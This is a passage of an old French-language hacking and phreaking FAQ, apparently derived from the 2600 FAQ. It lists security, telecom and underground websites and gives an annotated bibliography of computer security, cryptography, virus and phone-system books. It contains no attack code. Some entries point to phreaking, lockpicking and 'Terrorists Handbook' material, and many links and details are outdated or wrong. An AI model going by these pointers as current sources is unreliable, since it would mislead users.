 ciac.llnl.gov                                 (CIAC Web Site)
 community.net/community/all/home/solano/sbaldwin
 cs.purdue.edu/homes/spaf/coast.html           (The COAST Project and Laboratory)
 csbh.mhv.net/dcypher/home.html                (Dcypher's Home Page)
 csrc.ncsl.nist.gov                            (NIST)
 cwix.com/cwplc                                (Cable and Wireless)
 daemon.apana.org.au/~longi/
 dcpu1.cs.york.ac.uk:6666/fisher/telecom       (Embryonic Telephone History Page)
 dfw.net/~aleph1                               (The Uebercracker's Security Web)
 draco.centerline.com:8080/~franl/crypto.html  (Crypto)
 draco.centerline.com:8080/~franl/privacy/bacard-review.html
 enigma.pc.cc.cmu.edu/~caffeine/home.html      (Caffeine's Home Page)
 everest.cs.ucdavis.edu/Security.html          (UCDavis.edu Security Page)
 everest.cs.ucdavis.edu/slides/slides.html     (Security Lab Slides)
 ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html (CSSCR)
 fastlane.net/homepages/thegnome               (Simple Nomad)
 first.org                                     (FIRST)
 freeside.com/phrack.html                      (Phrack Magazine)
 frosted.mhv.net/keytrap.html
 ftp.arpa.mil                                  (ARPA home page)
 ftp.tamu.edu/~abr8030/security.html           (Security)
 grove.ufl.edu/~bytor                          (Bytor home page)
 hightop.nrl.navy.mil/potpourri.html           (MOD Security)
 hightop.nrl.navy.mil/rainbow.html             (MOD Rainbow Books)
 ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling)
 ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS)
 info.bellcore.com/BETSI/betsi.html            (Betsi)
 info.gte.com                                  (GTE Labrotories)
 info.mcc.ac.uk/Orange                         (Orange)
 infosec.nosc.mil/infosec.html                 (SPAWAR INFOSEC)
 infosec.nosc.mil/navcirt.html                 (NAVCIRT)
 iss.net/iss                                   (Internet Security Systems)
 jumper.mcc.ac.uk/~afs/telecom                 (UK Telecom Pricing Information)
 l0pht.com                                     (The l0pht)
 l0pht.com/~oblivion/IIRG.html                 (Phantasy Magazine)
 l0pht.com/~spacerog/index.html                (Whacked Mac Archives)
 lcs.mit.edu/telecom-archives/areacodes/guide  (North American Area Codes)
 lcs.mit.edu/telecom-archives/npa.800          (1-800 Info)
 lcs.mit.edu/telecom-archives/npa.900          (1-900 Info)
 lod.com                                       (Legion of Doom)
 lod.com/~gatsby                               (Gatsby)
 lod.com/~tabas                                (Mark Tabas -- LOD)
 lod.com/~vampire/emptime7                     (Empire Times)
 magicnet.net/xtabi/netscape/links/cypher.html (Cryptology)
 mars.superlink.net/user/esquire               (Red box info)
 matrix.resnet.upenn.edu/rourke                (FakeMail FAQ)
 mindlink.jolt.com                             (The Secrets of LockPicking)
 mindlink.net/A7657                            (Stephen H Kawamoto's Home Page)
 mls.saic.com                                  (SAIC MLS)
 mnementh.cs.adfa.oz.au/Lawrie_Brown.html      (Lawrie Brown's crypto bibliography)
 motserv.indirect.com                          (Motorola)
 naic.nasa.gov/fbi                             (FBI information)
 nasirc.nasa.gov/NASIRC_home.html              (NASIRC)
 obscura.com/~loki/                            (Cryptology)
 ophie.hughes.american.edu/~ophie              (Ophie)
 oregano.sl.pitt.edu/index.htm
 outpost.callnet.com/outpost.html
 pages.ripco.com:8080/~glr/glr.html            (Full Disclosure)
 peg.pegasus.oz.au                             (EFF Australia)
 quetel.qc.ca/qt0000ag.htm                     (Quebec-Telephone)
 resudox.net/bio/mainpage.html                 (BioHazard's Home Page)
 ripco.com:8080/~glr/glr.html                  (Full Disclosure)
 rschp2.anu.edu.au:8080/crypt.html
 scitsc.wlv.ac.uk/~cs6171/hack                 (UNIX Security)
 seclab.cs.ucdavis.edu/Security.html           (Security)
 seclab.cs.ucdavis.edu/slides/slides.html      (Security Lab Slides)
 sfpg.gcomm.com/mitnick/mitnick.htm            (3wP Kevin Mitnick WWW HomePage)
 smurfland.cit.buffalo.edu/NetMan/index.html   (Network Management)
 sunsite.unc.edu/sun/inform/sun-info.html      (Sun Microsystems Sponsor Page)
 support.mayfield.hp.com                       (Hewlett Packard SupportLine Services)
 tamsun.tamu.edu/~clm3840/hacking.html         (Hacking/Phreaking)
 the-tech.mit.edu                              (LaMacchia case info)
 town.hall.org/university/security/stoll/cliff.html (Cliff Stoll)
 turnpike.net/emporium/C/celestial/celest.html (Detective Databases 1995)
 ucs.orst.edu:8001/mintro.html                 (Micro Power Broadcasting)
 underground.org                               (Eubercrackers)
 unixg.ubc.ca:780/~jyee/                       (Cell)
 w3.gti.net/safety
 web.mit.edu/network/pgp.html                  (Getting PGP)
 web.nec.com/products/necam/mrd/cellphones/index.html(NEC)
 weber.u.washington.edu/~phantom/cpunk/index.html  (Cryptology)
 wildsau.idv.uni-linz.ac.at/~klon/underground/underground.html (Klon's Underground Links)
 wintermute.itd.nrl.navy.mil/5544.html         (Network Security)
 www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
 www-ns.rutgers.edu/www-security/index.html    (Rutger's documents on WWW security)
 www-personal.engin.umich.edu/~jgotts/underground/boxes.html   (Box info)
 www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html(This document)
 www-swiss.ai.mit.edu/~bal/pks-toplev.html     (Findingsomeone's PGP key)
 www.2600.com                                  (2600 Magazine)
 www.8lgm.org                                  (8lgm Security Advisories)
 www.aads.net                                  (Ameritech)
 www.access.gpo.gov/su_docs/
 www.aloha.com/~seanw/index.html
 www.alw.nih.gov/WWW/security.html             (Unix Security)
 www.artcom.de/CCC/hotlist.html                (Chaos Computer Club Hotlist)
 www.artech-house.com/artech.html              (Artech House)
 www.asg.unb.ca                                (Atlantic Systems Group Mosaic Index)
 www.aspentec.com/~frzmtdb/fun/hacker.html
 www.aston.ac.uk/~bromejt/mobile.html          (Mobile Phone Service Locator)
 www.att.com                                   (ATT)
 www.auditel.com                               (Auditel)
 www.auscert.org.au                            (Australian CERT)
 www.axent.com/axent                           (Axent Technologies)
 www.ba.com                                    (Bell Atlantic)
 www.bctel.com                                 (BC Tel)
 www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win)
 www.bell.ca                                   (Bell Canada)
 www.bell.com                                  (MFJ Task Force)
 www.bellcore.com/SECURITY/security.html       (Bellcore Security Products)
 www.border.com                                (Border Network Technologies)
 www.brad.ac.uk/~nasmith/index.html
 www.brad.ac.uk/~nasmith/underground.html      (Undergound WWW Sites)
 www.bst.bls.com                               (BellSouth)
 www.bt.co.uk                                  (British Telecom)
 www.business.co.uk/cellnet                    (Cellnet)
 www.c2.org:80/remail/by-www.html              (WWW-based remailing form)
 www.c3.lanl.gov/~mcn                          (Lanl)
 www.cam.org/~gagnon                           (OCP's)
 www.careermosaic.com/cm/uswest                (USWest)
 www.castle.net/~kobrien/telecom.html          (Telecom)
 www.cco.caltech.edu/~rknop/amiga_pgp26.html
 www.cdt.org/cda.html
 www.cec.wustl.edu/~dmm2/egs/egs.html          (En Garde Systems)
 www.cert.dfn.de/                              (German First Team)
 www.checkpoint.com                            (Checkpoint)
 www.chem.surrey.ac.uk/~ch11mh/secure.html     (Another page on secure WWW server setup)
 www.cis.ksu.edu/~psiber/fortress/phreak/ph2reak.html (Are You Some Kind Of PHREAK!)
 www.cis.ohio-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html
 www.cityscape.co.uk/users/ek80/index.html     (Inside Cable Cover)
 www.cohesive.com                              (Cohesive Systems)
 www.commerce.net/information/standards/drafts/shttp.txt (HyperText)
 www.con.wesleyan.edu/~triemer/network/docservs.html
 www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html
 www.cosc.georgetown.edu/~denning/crypto       (The Cryptography Project)
 www.cost.se                                   (COST Computer Security Technologies)
 www.cpsr.org/home                             (CPSR)
 www.crimson.com/isdn/telecomacry.txt          (Crimson's Telecommunications Acronyms)
 www.crtc.gc.ca                                (CRTC - Canadian regulator)
 www.cs.berkeley.edu/~raph/remailer-list.html  (Anon remailer list)
 www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html  (CMU Security)
 www.cs.purdue.edu/coast/coast.html            (Coast)
 www.cs.purdue.edu/pcert/pcert.html            (PCERT)
 www.cs.tu-bs.de                               (Network management Tools)
 www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk)
 www.cs.umd.edu/~lgas                          (Laughing Gas)
 www.cs.umd.edu/~lgas/haquerwerld/haquer-individuals.html(Haquerwerld)
 www.csd.harris.com/secure_info.html           (Harris)
 www.csl.sri.com                               (SRI Computer Science Lab)
 www.csua.berekeley.edu/pub/cypherpunks/Home.html  (Cryptology)
 www.cwi.nl/cwi/people/Jack.Jansen/spunk/cookbook.html
 www.cyber.co.uk/~joyrex                       (Joyrex Cellular)
 www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe)
 www.cygnus.com/~gnu/export.html               (Cryptography Export Control Archives)
 www.datafellows.fi                            (Data Fellows (F-Prot)
 www.datasync.com/~sotmesc/sotmesc.html        (SotMESC)
 www.dcs.exeter.ac.uk/~aba                     (Cypherpunk)
 www.dct.ac.uk/~misb3cp/2600/faq.txt
 www.demon.co.uk/mobiles                       (C.C.Mobiles)
 www.dhp.com                                   (DataHaven Project)
 www.dhp.com/~pluvius                          (Pluvius' Home Page)
 www.digicash.com/ecash/ecash-home.html        (Ecash Home Page)
 www.digital.com/info/key-secure-index.html    (Digital Secure Systems)
 www.dnai.com/~gui/index.html
 www.dtic.dla.mil/defenselink                  (Office of the U.S. Secretary of Defense (OSD)
 www.dtic.dla.mil/iac                          (DoD Information Analysis Center (IAC) Hub Page)
 www.eecs.nwu.edu/~jmyers/bugtraq/about.html
 www.eecs.nwu.edu/~jmyers/bugtraq/archives.html
 www.eecs.nwu.edu/~jmyers/bugtraq/index.html   (Bugtraq)
 www.eecs.nwu.edu/~jmyers/ids/index.html       (Intrusion Detection Systems)
 www.eff.org
 www.eff.org/pub/Alerts
 www.eff.org/pub/Net_info/Tools/Crypto/
 www.emap.co.uk/partners/racal-airtech         (Racal-Airtech)
 www.ensta.fr/internet/unix/sys_admin          (System administration)
 www.epic.org
 www.ericsson.nl                               (Ericsson)
 www.etext.org/Zines/                          (Zines)
 www.farmstead.com                             (Farmstead)
 www.fbi.gov/fbi/FBI_homepage.html             (FBI Homepage)
 www.fc.net/defcon                             (DefCon)
 www.fedworld.gov                              (Federal Government)
 www.first.org/first/                          (FIRST)
 www.fonorola.net                              (Fonorola (a Canadian carrier)
 www.frus.com                                  (Firewalls R Us)
 www.gbnet.net/kbridge                         (KarlBridge)
 www.getnet.com/crak                           (CRAK Software)
 www.getnet.com/~vision
 www.gold.net/users/cw78                       (FleXtel)
 www.greatcircle.com                           (Great Circle Associates)
 www.gsu.edu/~socrerx/catalog.html
 www.gta.com/index.html                        (Global Technology Associates)
 www.gti.net/grayarea                          (Gray Areas)
 www.hotwired.com                              (Wired Magazine)
 www.hpcc.gov/blue94/section.4.6.html          (NSA)
 www.hq2.telecom.ie                            (Telecom Eireann)
 www.iacr.org/~iacr                            (International Association of Cryptologic Research (IACR)
 www.ibmpcug.co.uk/~Vidtron                    (Videotron)
 www.ic.gov                                    (Central Intelligence Agency Home Page)
 www.ifi.uio.no/~staalesc/PGP/home.html
 www.iia.org/~gautier/me.html                  (Rich Gautier's Home Page)
 www.indirect.com/www/evildawg
 www.indirect.com/www/johnk/                   (CRAK Software)
 www.ingress.com                               (Ingress Communications)
 www.interaccess.com/trc/tsa.html
 www.io.org/~djcl/phoneb.html
 www.iquest.net/~oseidler                      (Oliver Seidler's WWW Page)
 www.itd.nrl.navy.mil/ITD/5540                 (NRL Center for High Assurance Computer Systems)
 www.itu.ch/TELECOM                            (Telecom '95)
 www.jagunet.com/~john/
 www.jedefense.com/jed.html                    (Journal of Electronic Defense)
 www.l0pht.com/cdc.html                        (Cult of the Dead Cow)
 www.l0pht.com/radiophone                      (Radiophone Archive)
 www.l0pht.com/~oblivion/IIRG.html             (International Information Retrieval Guild Archive Site)
 www.lat.com                                   (Los Altos Technologies)
 www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)
 www.lib.iup.edu/~seaman/hack/bone.html        (Bone's H/P/C page o' rama)
 www.links.net
 www.louisville.edu/~wrbake01                  (The GodZ of CyberSpacE)
 www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide)
 www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook)
 www.magi.com/~vektor/linenoiz.html
 www.mastercard.com                       (Secure Electronic Payment Protocol)
 www.mcs.com/~candyman/http/radio.html         (Radar)
 www.mcs.com/~candyman/under.html              (Cell)
 www.mcs.net/~candyman                         (H/P)
 www.mgmua.com/hackers/index.html              (Hackers, the movie)
 www.milkyway.com                              (Milkyway Networks Corporation)
 www.mit.edu:8001/people/warlord/pgp-faq.html  (PGP 2.6.2 FAQ, Buglist, Fixes, and Improvements)
 www.monmouth.com/~jshahom                     (The Insomniac's Home Page)
 www.mot.com                                   (Motorola)
 www.mpr.ca/                                   (MPR Teltech Ltd)
 www.msen.com/~emv/tubed/spoofing.html         (Info on IP spoofing attacks)
 www.mwjournal.com/mwj.html                    (Microwave Journal)
 www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/security.html(Security in Mosaic)
 www.ncsl.nist.gov                             (NIST Computer Systems Laboratory)
 www.net23.com                                 (Max Headroom)
 www.netpart.com                               (NetPartners)
 www.netresponse.com:80/zldf/
 www.nic.surfnet.nl/surfnet/security/cert-nl.html(CERT-NL)
 www.nist.gov                                  (NIST)
 www.nokia.com                                 (Nokia)
 www.nortel.com                                (Northern Telecom)
 www.ntt.jp                                    (Nippon Telephone)
 www.nynex.co.uk/nynex                         (NYNEX)
 www.odci.gov                                  (The CIA)
 www.one2one.co.uk                             (Mercury One-2-One)
 www.open.gov.uk/oftel/oftelwww/oftelhm.htm    (OFTEL's Home Page)
 www.openmarket.com/info/cryptography/applied_cryptography.html
 www.pacbell.com                               (Pacific Bell)
 www.panix.com/vtw
 www.paranoia.com/astrostar/fringe.html
 www.paranoia.com/hpa                          (Paranoia's H/P/A Links)
 www.paranoia.com/mthreat                      (ToneLoc)
 www.paranoia.com/~coldfire                    (Cold Fire's Web Page)
 www.paranoia.com/~darkfox                     (Darkfox's Home Page)
 www.paranoia.com/~ice9                        (Ice-9's Home Page)
 www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)
 www.phantom.com/~darkcyde                     (DarkCyde)
 www.phantom.com/~king                         (Randy King's WWW Page)
 www.phillips.com                              (Phillips Electronics)
 www.phred.org                                 (The Phred Networking Organization)
 www.pic.net/uniloc/starlink                   (Starlink)
 www.planet.net/onkeld                         (BlueBeep Home Page)
 www.primenet.com/~kludge/haqr.html            (Kludge)
 www.quadralay.com/www/Crypt/Crypt.html        (Quadralay Cryptography)
 www.qualcomm.com/cdma/wireless.html           (Qualcomm CDMA)
 www.ramp.com/~lcs/winpgp.html                 (PGP with MS/Win)
 www.raptor.com                                (Raptor)
 www.raptor.com/raptor/raptor.html             (Raptor Network Isolator)
 www.research.att.com                          (AT&T)
 www.rocksoft.com/~ross                        (Rocksoft Pty (Veracity)
 www.rogers.com                                (Rogers Communications)
 www.rsa.com                                   (RSA Data Security)
 www.sasknet.sk.ca/Pages/sktlhome.html         (SaskTel)
 www.satelnet.org/~ccappuc
 www.sccsi.com/lsli/lsli.homepage.html         (PORTUS)
 www.sctc.com                                  (Secure Computing Corporation)
 www.seas.upenn.edu/~rourkem                   (FakeMail FAQ)
 www.seduction.com
 www.sei.cmu.edu/SEI/programs/cert.html        (CERT Coordination Center)
 www.service.com/cm/uswest/usw1.html           (USWest)
 www.shore.net/~eskwired/hp.html
 www.soci.niu.edu/~cudigest
 www.somar.com                                 (Somar Software)
 www.soscorp.com                               (Sources of Supply Corp)
 www.spatz.com/pecos/index.html                (The World of Hacking)
 www.spy.org                                   (Computer Systems Consulting)
 www.spy.org                                   (spy.org)
 www.sri.com                                   (SRI)
 www.stentor.ca                                (Stentor (Canadian telcos)
 www.tecc.co.uk/public/uk-telecom/btns.html    (BT "star services")
 www.telecoms-mag.com/tcs.html                 (Telecommunications Magazine)
 www.telkom.co.za                              (Telkom S.A. Ltd)
 www.telstra.com.au/info/security.html         (Security Reference Index)
 www.teresa.com
 www.tezcat.com/web/security/security_top_level.html
 www.tiac.net/users/triad/philes/jokai.html    (Jokai Reservation for the Preservation of the 1st Amendment)
 www.ticllc.net/~scrtnizr
 www.tis.com                                   (Trusted Information Systems)
 www.trcone.com/t_crookb.html                  (CrookBook)
 www.tregistry.com/ttr                         (Telecomunications Training Courses)
 www.tri.sbc.com                               (Southwestern Bell)
 www.tricon.net/Comm/synapse                   (Synapse Magazine)
 www.tufts.edu/~jpagano/
 www.uccs.edu/~abusby/hpawebsites.html
 www.uccs.edu/~abusby/k0p.html                 (kn0wledge phreak)
 www.uci.agh.edu.pl/pub/security               (Security)
 www.uknet.net/pnc                             (The Personal Number Company)
 www.umcc.umich.edu/~doug/virus-faq.html       (Virus)
 www.underground.org                           (underground.org)
 www.underground.org/bugs/
 www.usfca.edu/crackdown/crack.html            (Hacker Crackdown)
 www.vodafone.co.uk                            (Vodafone)
 www.vptt.ch/natel.html                        (Natel)
 www.wam.umd.edu/~ankh/public/devil_does_unix
 www.warwick.ac.uk/WWW/search/Phones/nng.html  (National Number Group Codes)
 www.well.com/user/abacard
 www.well.com/user/crunch                      (Captain Crunch)
 www.wfu.edu/~wilsonbd
 www.wiltel.com                                (Wiltel)
 www.wiltel.com/glossary/glossary.html         (Telecommunications Glossary)
 www.wired.com                                 (HotWired)
 www2.undernet.org:8080/~cs93jtl/IRC.html      (IRC)


OUA !!! ca en fait un paquet :

Les sites francais  present : 

ftp : ???

www:

http://www.chez.com/norace/			NoRace : groupe de phreak
http://www.micronet.fr/~darcelf/		Le hacking en france
http://www.chez.com/palm/			Page du hackeur Palm
http://www.frhack.org				Groupe de frhack
http://www.linux-france.com			Linux France
http://www.linux.sos-informatique.com	Un autre site Linux en francais
http://www.linux-kheops.com/			Kheops
http://						PGP

Les bouquins interressants :

En anglais (toujour tire du faq de 2600(on vous l'a traduit quand meme)):

Securite general des ordinateurs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Computer Security Basics
  Auteur: Deborah Russell and G.T. Gengemi Sr.
  Editeur: O'Reilly & Associates, Inc.
  Copyright Date: 1991
  ISBN: 0-937175-71-4

        C'est un excellent bouquin.  Il donne une vue general de la securite
        informatique sans sacridier les details. C bon pour le commencement
        des experts en securites.

  Information Systems Security
  auteur: Philip Fites and Martin Kratz
  Editeur: Van Nostrad Reinhold
  Copyright Date: 1993
  ISBN: 0-442-00180-0

  Computer Related Risks
  Auteur: Peter G. Neumann
  Editeur: Addison-Wesley
  Copyright Date: 1995
  ISBN: 0-201-55805-X

  Computer Security Management
  Auteur: Karen Forcht
  Editeur: boyd & fraser publishing company
  Copyright Date: 1994
  ISBN: 0-87835-881-1

  The Stephen Cobb Complete Book of PC and LAN Security
  Aureur: Stephen Cobb
  Editeur: Windcrest Books
  Copyright Date: 1992
  ISBN: 0-8306-9280-0 (hardback) 0-8306-3280-8 (paperback)

  Security in Computing
  Auteur: Charles P. Pfleeger
  Editeur: Prentice Hall
  Copyright Date: 1989
  ISBN: 0-13-798943-1.

  Building a Secure Computer System
  Auteur: Morrie Gasser
  Editeur: Van Nostrand Reinhold Co., New York.
  Copyright Date:
  ISBN: 0-442-23022-2

  Modern Methods for Computer Security
  Auteur: Lance Hoffman
  Editzue: Prentice Hall
  Copyright Date: 1977
  ISBN:

  Windows NT 3.5 Guidelines for Security, Audit and Control
  Auteur:
  Editeur: Microsoft Press
  Copyright Date:
  ISBN: 1-55615-814-9

  Protection and Security on the Information Superhighway
  Auteur: Dr. Frederick B. Cohen)
  Editeur: John Wiley & Sons
  Copyright Date: 1995
  ISBN: 0-471-11389-1

  Commonsense Computer Security
  Auteur: Martin Smith
  editeur: McGraw-Hill
  Copyright Date: 1993
  ISBN: 0-07-707805-5

  Combatting Computer Crime
  Auteur: Jerry Papke
  editeur: McGraw-Hill, Inc. / Chantico Publishing Company, Inc.
  Copyright Date: 1992
  ISBN: 0-8306-7664-3

  Computer Crime: a Crimefighters Handbook
  Auteur: David Icove, Karl Seger and William VonStorch
  Editeur: O'Reilly & Associates
  Copyright Date: 1995
  ISBN: 1-56592-086-4


Securite des system Unix
~~~~~~~~~~~~~~~~~~~~~~~~
  
  Practical Unix Security
  Auteur: Simson Garfinkel and Gene Spafford
  Editeur: O'Reilly & Associates, Inc.
  Copyright Date: 1991
  ISBN: 0-937175-72-2

  Firewalls and Internet Security
  Auteur: William Cheswick and Steven Bellovin
  Editeur: Addison Wesley
  Copyright Date: 1994
  ISBN: 0-201-63357-4

  Unix System Security
  Auteur: Rik Farrow
  Editeur: Addison Wesley
  Copyright Date: 1991
  ISBN: 0-201-57030-0

  Unix Security: A Practical Tutorial
  Auteur: N. Derek Arnold
  Editeur: McGraw Hill
  Copyright Date: 1993
  ISBN: 0-07-002560-6

  Unix System Security: A Guide for Users and Systems Administrators
  Auteur: David A. Curry
  Editeur: Addison-Wesley
  Copyright Date: 1992
  ISBN: 0-201-56327-4

  Unix System Security
  Auteur: Patrick H. Wood and Stephen G. Kochan
  Editeur: Hayden Books
  Copyright Date: 1985
  ISBN: 0-672-48494-3

  Unix Security for the Organization
  Auteur: Richard Bryant
  Editeur: Sams
  Copyright Date: 1994
  ISBN: 0-672-30571-2

  Building Internet Firewalls
  Auteur: D. Brent Chapman and Elizabeth D. Zwicky
  Editeur: O'Reilly and Associates, Inc.
  Copyright Date: 1995
  ISBN: 1-56592-124-0

  Unix System Security Essentials
  Auteur: Christopher Braun
  Editeur: Addison Wesley
  Copyright Date: 1995
  ISBN: 0-201-42775-3

  Internet Firewalls and Network Security
  Auteur: Karanjit S. Siyan and Chris Hare
  Editeur: New Riders Publishing
  Copyright Date: 1995
  ISBN: 1-56205-437-6


Network Security
~~~~~~~~~~~~~~~~
  Network Security Secrets
  Auteur: David J. Stang and Sylvia Moon
  Editeur: IDG Books
  Copyright Date: 1993
  ISBN: 1-56884-021-7

        On note un gaspillage total de papier. Le bouquin ne vaut pas
        son prix : $45.95. Le livre est une reprise des informations deja
        publies. Le seul secret que l'on apprend est que Sylvia Moon est une 
        jeune femme qui a un rapport amoureux avec le vieux David Stang.
        Passez votre chemin...

  Complete Lan Security and Control
  Auteur: Peter Davis
  Editeur: Windcrest / McGraw Hill 
  Copyright Date: 1994
  ISBN: 0-8306-4548-9 and 0-8306-4549-7

  Network Security
  Auteur: Steven Shaffer and Alan Simon
  Editeur: AP Professional
  Copyright Date: 1994
  ISBN: 0-12-638010-4

  Network Security: How to Plan For It and How to Achieve It
  Auteur: Richard M. Baker
  Editeur: McGraw-Hill, Inc.
  Copyright Date:
  ISBN: 0-07-005141-0

  Network Security
  Auteur: Steven L. Shaffer and Alan R. Simon
  Editeur: Academic Press
  Copyright Date: 1994
  ISBN: 0-12-638010-4

  Network Security: Private Communications in a Public World
  Auteur: Charlie Kaufman, Radia Perlman and Mike Speciner
  Editeur: Prentice Hall
  Copyright Date: 1995
  ISBN: 0-13-061466-1

  Network and Internetwork Security: Principles and Practice
  Auteur: William Stallings
  Editeur: Prentice Hall
  Copyright Date: 1995
  ISBN: 0-02-415483-0

  Implementing Internet Security
  Auteur: William Stallings
  Editeur: New Rider Publishing
  Copyright Date: 1995
  ISBN: 1-56205-471-6

  Actually Useful Internet Security Techniques
  Auteur: Larry J. Hughes, Jr.
  Editeur: New Riders Publishing
  Copyright Date: 1995
  ISBN: 1-56205-508-9


Cryptology
~~~~~~~~~~~~
  Applied Cryptography: Protocols, Algorithms, and Source Code in C
  Auteur: Bruce Schneier
  Editeur: John Wiley & Sons
  Copyright Date: 1994
  ISBN: 0-471-59756-2

        Le livre de Bruce Schneider remplace tout les autre textes en 
        matiere de cryptographie. Si vous etes interresse, c'est vraiment
        un livre  lire. C le premier et le dernier livre dont vous pouvez
        avoir besoin d'acheter.

  Cryptography and Data Security
  Auteur: Dorothy Denning
  Editeur: Addison-Wesley Publishing Co.
  Copyright Date: 1982
  ISBN: 0-201-10150-5

  Protect Your Privacy: A Guide for PGP Users
  Auteur: William Stallings
  Editeur: Prentice-Hall
  Copyright Date: 1994
  ISBN: 0-13-185596-4

  Codebreakers
  Auteur: Kahn
  Editeur: Simon and Schuster
  Copyright Date:
  ISBN:0-02-560460-0

  Codebreakers: The Inside Story of Bletchley Park
  Auteur: Francis Harry Hinsley and Alan Stripp
  Editeur: Oxford University Press,
  Copyright Date: 1993
  ISBN:0-19-285304-X

  Cryptanalysis, a study of ciphers and their solution
  Auteur: Gaines, Helen Fouche
  Editeur: Dover Publications
  Copyright Date: 1956
  ISBN:

  Computer Privacy Handbook
  Auteur: Andre' Bacard
  Editeur: Peachpit Press
  Copyright Date: 1995
  ISBN: 1-56609-171-3

  E-Mail Security with PGP and PEM
  Auteur: Bruce Schneier
  Editeur: John Wiley & Sons
  Copyright Date: 1995
  ISBN: 0-471-05318-X

  PGP: Pretty Good Privacy
  Auteur: Simson Garfinkel
  Editeur: O'Reilly & Associates, Inc.
  Copyright Date: 1995
  ISBN: 1-56592-098-8


Programmed Threats
~~~~~~~~~~~~~~~~~~
  The Little Black Book of Computer Viruses
  Auteur: Mark Ludwig
  Editeur: American Eagle Publications
  Copyright Date: 1990
  ISBN: 0-929408-02-0

  The Giant Black Book of Computer Viruses
  Auteur: Mark Ludwig
  Editeur: American Eagle Publications
  Copyright Date: 1995
  ISBN:

  Computer Viruses, Artificial Life and Evolution
  Auteur: Mark Ludwig
  Editeur: American Eagle Publications
  Copyright Date: 1993
  ISBN: 0-929408-07-1

  Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
        Threats to Your System
  Auteur: John McAfee and Colin Haynes
  Editeur: St. Martin's Press
  Copyright Date: 1989
  ISBN: 0-312-03064-9 and 0-312-02889-X

  The Virus Creation Labs: A Journey Into the Underground
  Auteur: George Smith
  Editeur: American Eagle Publications
  Copyright Date: 1994
  ISBN: 0-929408-09-8

  A Short Course on Computer Viruses
  Auteur: Dr. Fred Cohen
  Editeur: John Wiley & Sons
  Copyright Date: 1994
  ISBN: 0-471-00769-2

  Robert Slade's Guide to Computer Viruses
  Auteur: Robert Slade
  Editeur: Springer-Verlag
  Copyright Date: 1994
  ISBN: 0-387-94311-0 / 3-540-94311-0


Telephony
~~~~~~~~~
  Engineering and Operations in the Bell System
  Auteur: R.F. Rey
  Editeur: Bell Telephont Laboratories
  Copyright Date: 1983
  ISBN: 0-932764-04-5

        Bienqu'il soit un peu vieux, ce livre est surement le bouquin pour
        la telecomunication. Ce livre est 100% Bell et est adore par les 
        Phreakers du monde entier.

  Telephony: Today and Tomorrow
  Auteur: Dimitris N. Chorafas
  Editeur: Prentice-Hall
  Copyright Date: 1984
  ISBN: 0-13-902700-9

  The Telecommunications Fact Book and Illustrated Dictionary
  Auteur: Ahmed S. Khan
  Editeur: Delmar Publishers, Inc.
  Copyright Date: 1992
  ISBN: 0-8273-4615-8

        Ce dictionnaire peut etre une exellente reference pour le sujet.
        Pour tous ceux qui compte s'y mettre...

  Tandy/Radio Shack Cellular Hardware
  Auteur: Judas Gerard and Damien Thorn
  Editeur: Phoenix Rising Communications
  Copyright Date: 1994
  ISBN:

  The Phone Book
  Auteur: Carl Oppendahl
  Editeur: Consumer Reports
  Copyright Date:
  ISBN: 0-89043-364-x

  Principles of Caller I.D.
  Auteur:
  Editeur: International MicroPower Corp.
  Copyright Date:
  ISBN:


Hacking History and Culture
~~~~~~~~~~~~~~~~~~~~~~~~~~~
  The Hacker Crackdown: Law and Disorder on the Electronic Frontier
  Auteur: Bruce Sterling
  Editeur: Bantam Books
  Copyright Date: 1982
  ISBN: 0-553-56370-X

        Bruce Sterling a realise recemment le livre gratuit sur le net.
        Le livre est plus facile a lite dans sa forme imprime et il ne coute
        que $5.99. Monsieur Sterling est un exellent auteur de science 
        fiction et a prouve son talent en mettant aux service de 
        l'underground informatique ses mots. Une tres belle experience en 
        perspective...

  Cyberpunk
  Auteur: Katie Hafner and John Markoff
  Editeur: Simon and Schuster
  Copyright Date: 1991
  ISBN: 0-671-77879-X

  The Cuckoo's Egg
  Auteur: Cliff Stoll
  Editeur: Simon and Schuster
  Copyright Date: 1989
  ISBN: 0-671-72688-9

  Hackers: Heroes of the Computer Revolution
  Auteur: Steven Levy
  Editeur: Doubleday
  Copyright Date: 1984
  ISBN: 0-440-13495-6


Unclassified
~~~~~~~~~~~~
  The Hacker's Handbook
  Auteur: Hugo Cornwall
  Editeur: E. Arthur Brown Company
  Copyright Date:
  ISBN: 0-912579-06-4

  Secrets of a Super Hacker
  Auteur: The Knightmare
  Editeur: Loompanics
  Copyright Date: 1994
  ISBN: 1-55950-106-5

        The Knightmare n'est pas un super hacker. On apprend peu ou pas du 
        tout d'informations. The Knightmare vous donne quelque conseil du 
        style ne pas vous deguiser avant de faire du trashing (fouiller les 
        les poubelles). Le meilleur hack de The Knightmare c'est d'avoir 
        fouler ces memorables ordures.

  The Day The Phones Stopped
  Auteur: Leonard Lee
  Editeur: Primus / Donald I Fine, Inc.
  Copyright Date: 1992
  ISBN: 1-55611-286-6

      ToTTAl GarBage !!!! 
 
  Information Warfare
  Auteur: Winn Swartau
  Editeur: Thunder Mountain Press
  Copyright Date: 1994
  ISBN: 1-56025-080-1

  An Illustrated Guide to the Techniques and Equipment of Electronic Warfare
  Auteur: Doug Richardson
  Editeur: Salamander Press
  Copyright Date:
  ISBN: 0-668-06497-8


En franais :

tous les editeurs dont nous parlons editent en France : pour les autres 
francophones (Quebec, Suisse, Belgique, etc) il va falloir vous renseigner.

Reseaux et telecommunication en general :
